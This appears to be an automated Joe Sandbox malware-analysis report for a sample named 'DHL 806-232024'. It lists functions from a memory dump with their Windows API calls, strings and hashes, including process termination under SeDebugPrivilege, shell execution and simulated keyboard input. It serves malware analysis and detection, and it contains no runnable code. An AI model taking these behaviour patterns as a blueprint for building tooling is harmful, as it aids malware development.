API String ID: 4152858687-2120411300
Opcode ID: 1580dd9cea03dfab155b5de779591c9a22b4572fe75bf3e7719fcecc29705252
Instruction ID: c86eea49272971f70cb2a76f8726bdb1dfd3f145dfafce95f35c2db333a30eac
Opcode Fuzzy Hash: 1580dd9cea03dfab155b5de779591c9a22b4572fe75bf3e7719fcecc29705252
Instruction Fuzzy Hash: 8D51B33165C3009ED725DF68C845A6BB7E8EF85360F048A2EF895D7291DB74CE448F92

Function 00956FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00957093
SendMessageW.USER32(?,00001036,00000000,?), ref: 009570A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009570C1
_wcscat.LIBCMT ref: 0095711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00957133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00957161

Strings

SysListView32, xrefs: 00957065

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 127b7e853cf601c4b0ab1ff59e89a7c68892b16922d1446821f78203dfd6dc07
Instruction ID: 9a14542ec94d5119e1a729e919f3ab29714d4fe2d76dea6a4c62c2ee179dd868
Opcode Fuzzy Hash: 127b7e853cf601c4b0ab1ff59e89a7c68892b16922d1446821f78203dfd6dc07
Instruction Fuzzy Hash: 92418F71A04308ABDB21DFB5DC85BEAB7E8EF48355F10052AF944E7291D6719E888B60

Function 0094EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00933E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00933EB6
Part of subcall function 00933E91: Process32FirstW.KERNEL32(00000000,?), ref: 00933EC4
Part of subcall function 00933E91: CloseHandle.KERNEL32(00000000), ref: 00933F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094ECB8
GetLastError.KERNEL32 ref: 0094ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 0094ED77
GetLastError.KERNEL32(00000000), ref: 0094ED82
CloseHandle.KERNEL32(00000000), ref: 0094EDB7

Strings

SeDebugPrivilege, xrefs: 0094ECD6

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 32e8e4c9a5c540d11597273d2566aa907e122d45ab22f18c51c135c4d3f6c03b
Instruction ID: 402ae15890f824f61732231fe888dc0ae156d45b07c96455879a91bfdf089979
Opcode Fuzzy Hash: 32e8e4c9a5c540d11597273d2566aa907e122d45ab22f18c51c135c4d3f6c03b
Instruction Fuzzy Hash: 2A419A716042109FDB14EF28CC95F6EB7A5BF80714F088459F9829B2D2DB75A804CB96

Function 00933226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 009332C5

Strings

info, xrefs: 00933266
question, xrefs: 0093327E
blank, xrefs: 00933247
stop, xrefs: 00933296
warning, xrefs: 009332AE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 9bf69f6f3b138ceee70dcb1638c52c3e13f1c89f47ae1272e1fb92200a5e6d2b
Instruction ID: 65321a41cfa93936f875d656da20933b74f40c471a69a8a448506cda3db60a33
Opcode Fuzzy Hash: 9bf69f6f3b138ceee70dcb1638c52c3e13f1c89f47ae1272e1fb92200a5e6d2b
Instruction Fuzzy Hash: E2110D3568C34A7BE7015B65DC43C6BB39CEF19374F10402AF52196281D7759B804FB6

Function 00934534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0093454E
LoadStringW.USER32(00000000), ref: 00934555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0093456B
LoadStringW.USER32(00000000), ref: 00934572
_wprintf.LIBCMT ref: 00934598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 009345B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00934593

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 3aac6418ffc0a9ba4ed8672e8301c50d40d95b3fc990de2988f763185634a8aa
Instruction ID: e610336130bf61fbc7b5e7e65021faf231f108b96c94a559c1d02b6fe762bb03
Opcode Fuzzy Hash: 3aac6418ffc0a9ba4ed8672e8301c50d40d95b3fc990de2988f763185634a8aa
Instruction Fuzzy Hash: 9A014FF290430CBFE711A7A5DD89EFB776CEB08312F0005A5BB45D2051EA749E858B71

Function 0095D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

GetSystemMetrics.USER32(0000000F), ref: 0095D78A
GetSystemMetrics.USER32(0000000F), ref: 0095D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0095D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0095DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0095DA24
ShowWindow.USER32(00000003,00000000), ref: 0095DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 0095DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 0095DA8B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: a62c733a8c27c6dd6bd197057ebfbbc280bd2563853c3c337bf4095a41342b84
Instruction ID: c1a592af52ac8a3f0f6028f2c529d71b651ae88c71775d973c8c871f6fa8d8ac
Opcode Fuzzy Hash: a62c733a8c27c6dd6bd197057ebfbbc280bd2563853c3c337bf4095a41342b84
Instruction Fuzzy Hash: EDB1DA71602215EFDF24CF6AC9947BE7BB5FF08702F088069EC489B295D734A958CB90

Function 008D2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000), ref: 008D2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000,000000FF), ref: 008D2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000), ref: 0090C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000), ref: 0090C4D6

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 11687efd34c8d2fe11a99ddd3946f3be9bc0ba028fa5f2a3c34f0a8468ae84f5
Instruction ID: 5d072d1df8b08348e5f202028a72d1a28636aa8208d90dd259fd1d6567c3d8b7
Opcode Fuzzy Hash: 11687efd34c8d2fe11a99ddd3946f3be9bc0ba028fa5f2a3c34f0a8468ae84f5
Instruction Fuzzy Hash: FE4105303187949EC7358B298C9CB7A7B96FBA5324F588A1BE047C67B0C675A881E710

Function 00937368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0093737F

Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009373B6
EnterCriticalSection.KERNEL32(?), ref: 009373D2
_memmove.LIBCMT ref: 00937420
_memmove.LIBCMT ref: 0093743D
LeaveCriticalSection.KERNEL32(?), ref: 0093744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00937461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00937480

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: dffcd77f20d014bd2ec8feaebf608b134b20e09c87378a8ccbaf3ac5ea36d1e3
Instruction ID: 93a9b1364d1332c2bc019e400f669f7800e52de5d6251c1b7be9e330de07167d
Opcode Fuzzy Hash: dffcd77f20d014bd2ec8feaebf608b134b20e09c87378a8ccbaf3ac5ea36d1e3
Instruction Fuzzy Hash: CB317071904205EBCF10DFA9DC89AAFBBB8FF44711F1441A5FA04DB296DB309A10DBA1

Function 00956442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0095645A
GetDC.USER32(00000000), ref: 00956462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0095646D
ReleaseDC.USER32(00000000,00000000), ref: 00956479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009564B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009564C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00959299,?,?,000000FF,00000000,?,000000FF,?), ref: 00956500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00956520

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: e0ea5ad6c3f838ccb522cf7a8383ad1e352f6648315e4ac1fab88d581ee20708
Instruction ID: e33fdd96c9e3faa88618f8e00d5f61bf769131c45fd0b87334e33d1ef35aadde
Opcode Fuzzy Hash: e0ea5ad6c3f838ccb522cf7a8383ad1e352f6648315e4ac1fab88d581ee20708
Instruction Fuzzy Hash: 97318D72215214BFEF108F11CC4AFEB3FADEF09766F040065FE089A191D6759842CB60

Function 0092C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0092C087
_memcmp.LIBCMT ref: 0092C0A9
_memcmp.LIBCMT ref: 0092C0C1
_memcmp.LIBCMT ref: 0092C0D4
_memcmp.LIBCMT ref: 0092C0EE
_memcmp.LIBCMT ref: 0092C101
_memcmp.LIBCMT ref: 0092C119
_memcmp.LIBCMT ref: 0092C134

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9a74799085ca5bf9ef76cf30976ef769522fb32bdc085118cba7aae79fe62014
Instruction ID: 13fcdbe2bd46aad93df2a042b37884b2300dbec41a1d8da2b11f5a516cce8b35
Opcode Fuzzy Hash: 9a74799085ca5bf9ef76cf30976ef769522fb32bdc085118cba7aae79fe62014
Instruction Fuzzy Hash: 1D21C5E1684629B7DA14A735AC46FBF339CEF70799B040020FE05D62C7E759DD2181A6

Function 0093ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9

_wcstok.LIBCMT ref: 0093EEFF
_wcscpy.LIBCMT ref: 0093EF8E
_memset.LIBCMT ref: 0093EFC1

Strings

X, xrefs: 0093EFFE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: b19f15c42c1cb5ce12e31da4b212a5f7a43445d059a259e5902211fee43f7017
Instruction ID: 9fca097b5fb82d4c02491ed4d8fc218d1172441cae4f1fde280209cd87557833
Opcode Fuzzy Hash: b19f15c42c1cb5ce12e31da4b212a5f7a43445d059a259e5902211fee43f7017
Instruction Fuzzy Hash: F4C119715087419FC724EF28D895A6AB7E4FF85310F044A2EF899973A2DB70ED45CB82

Function 00946E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00946F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00946F35
WSAGetLastError.WSOCK32(00000000), ref: 00946F48
htons.WSOCK32(?,?,?,00000000,?), ref: 00946FFE
inet_ntoa.WSOCK32(?), ref: 00946FBB

Part of subcall function 0092AE14: _strlen.LIBCMT ref: 0092AE1E
Part of subcall function 0092AE14: _memmove.LIBCMT ref: 0092AE40

_strlen.LIBCMT ref: 00947058
_memmove.LIBCMT ref: 009470C1

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: a8af822057a96bc351e177cb3ecc2b0f9b860e05f9ccf06aab21c731f2e3a434
Instruction ID: 10416b602624d8a5d5865876443649ea28808228e793232903e255fb01639db9
Opcode Fuzzy Hash: a8af822057a96bc351e177cb3ecc2b0f9b860e05f9ccf06aab21c731f2e3a434
Instruction Fuzzy Hash: 7681EF71108300ABD710EF68CC86F6BB7E9EF84724F104A1EF5559B2A2DB70AD04CB92

Function 008D1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4edece54643b447409d759252d084299f045aaf93a3d3871bc5f0ec5777784a2
Instruction ID: 7f65a58d7afb5a1199f4821ff10a9da9b5bf65a9bd9b1cb3f0b631541a94154e
Opcode Fuzzy Hash: 4edece54643b447409d759252d084299f045aaf93a3d3871bc5f0ec5777784a2
Instruction Fuzzy Hash: 8C714B30904109FFCF049F99C849AAEBB7AFF85324F14825AF915AB351C734AA51CBA5

Function 0095B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00E257D0), ref: 0095B6A5
IsWindowEnabled.USER32(00E257D0), ref: 0095B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0095B795
SendMessageW.USER32(00E257D0,000000B0,?,?), ref: 0095B7CC
IsDlgButtonChecked.USER32(?,?), ref: 0095B809
GetWindowLongW.USER32(00E257D0,000000EC), ref: 0095B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0095B843

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 9eb5b22bf60adc1dde7e4cf520f5e624d579775c2a3b2b3ac42338cdef4d383b
Instruction ID: a895e0ecbd20efbff94687cbeadc8793a3cb76a97fc905b58d5939a80186fff2
Opcode Fuzzy Hash: 9eb5b22bf60adc1dde7e4cf520f5e624d579775c2a3b2b3ac42338cdef4d383b
Instruction Fuzzy Hash: 6371BB34605304AFDB20DF66C8A4FAABBF9FF89352F144469FD45972A1C731A848DB10

Function 0094F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0094F75C
_memset.LIBCMT ref: 0094F825
ShellExecuteExW.SHELL32(?), ref: 0094F86A

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9

GetProcessId.KERNEL32(00000000), ref: 0094F8E1
CloseHandle.KERNEL32(00000000), ref: 0094F910

Strings

@, xrefs: 0094F839

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: cf3e9b7bfafefe82cea32907ddb4275fbc6fc2c4c3bb73f5b9bee933d7664a57
Instruction ID: 6982b11894ba824591fb8afd2f7c124e0d3ae5bb7413b4152e691fbbfd620450
Opcode Fuzzy Hash: cf3e9b7bfafefe82cea32907ddb4275fbc6fc2c4c3bb73f5b9bee933d7664a57
Instruction Fuzzy Hash: A5619075A0061AEFCF14EF68C5909AEBBF5FF48310F14856AE846AB351CB30AD40CB91

Function 0093145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0093149C
GetKeyboardState.USER32(?), ref: 009314B1
SetKeyboardState.USER32(?), ref: 00931512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00931540
PostMessageW.USER32(?,00000101,00000011,?), ref: 0093155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 009315A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 009315C8

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 23b48c09f54163f09856e001563f97d46c5c50db436fa55751cf87779215bc82
Instruction ID: 17903c1724b1cd883894ce21c6e6f4e39c7850791889ac3fd752bdf1f4cd52ad
Opcode Fuzzy Hash: 23b48c09f54163f09856e001563f97d46c5c50db436fa55751cf87779215bc82
Instruction Fuzzy Hash: F35103A0A087D53EFB3643748C09BBA7EAD5B46304F0C8489F1D6468E2C3D8EC94DB51

Function 00931276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 009312B5
GetKeyboardState.USER32(?), ref: 009312CA
SetKeyboardState.USER32(?), ref: 0093132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00931357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00931374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009313B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009313D9

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8294b3b03e5f88d6d5bf0be25a61a9e2af2129ecd1b97cae8d4f1c2c95185048
